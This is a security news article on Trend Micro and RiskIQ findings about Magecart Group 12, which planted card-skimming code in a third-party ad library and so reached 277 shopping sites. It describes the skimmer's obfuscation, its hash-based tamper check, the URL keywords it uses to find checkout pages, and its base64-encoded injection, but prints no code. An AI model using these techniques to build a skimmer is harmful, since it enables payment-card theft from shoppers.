The Magecart card-skimming crime conglomerate has changed up its tactics in recent campaigns, injecting malicious code into third-party Java libraries used by e-commerce websites to serve advertisements.
Typically, Magecart subsidiaries tend to compromise a few targeted websites in order to directly inject skimming malware into a website; the malware then harvests payment card information from online check-out pages.
According to Trend Micro, campaigns surfacing in January instead victimized a third-party library – this enables all websites embedded with the script to load the skimming code. It’s an efficient tactic that resulted in the victimization of 277 different e-commerce websites in less than a week.
Magecart, in operation since 2015, continues to present an insidious threat and has been blamed for an array of recent breaches, including one of the most prolific card-stealing operations seen in the wild to date. The group is famously made up of dozens of subgroups; researchers from Trend Micro believe this particular campaign was carried out by Magecart Group 5 (the same crew behind the Ticketmaster breach), or Group 12 (a relatively new Magecart cell).
Trend Micro reported that Adverline has handled the incident and has immediately carried out the necessary remediation operations in relationship with the CERT La Poste, so the websites are now clean.
Magecart Group 12
The team also took a look at Magecart Group 12’s toolkit, since this particular subgroup is new to the organization. Researchers found that it uses a skimming toolkit that employs two obfuscated scripts.
“The first script is mostly for anti-reversing while the second script is the main data-skimming code,” according to the analysis. “They also include code integrity checking that detects if the script is modified. The check is done by calculating a hash value to the script section, and stops the execution of the script if it finds that it doesn’t match the original hash.”
Interestingly, upon infection, the main skimming code checks to see if it has executed on an appropriate shopping cart website.
“[This is done] by detecting related strings in the URL like ‘checkout,’ ‘billing’ and ‘purchase,’ among others,” Trend Micro analysts explained. “Also of note are the strings ‘panier,’ which means ‘basket’ in French, and ‘kasse,’ or ‘checkout’ in German.” If it determines that it’s in the right place, the script then sets about copying both the form name and values keyed in by the user.
“Group 12 built out its infrastructure in September 2018; domains were registered, SSL certificates were set up through LetsEncrypt, and the skimming backend was installed,” explained Yonathan Klijnsma, researcher at RiskIQ, which partnered with Trend Micro to examine the new campaigns. “Group 12 doesn’t just inject the skimmer code by adding a script tag—the actors use a small snippet with a base64 encoded URL for the resource which is decoded at runtime and injected into the page.”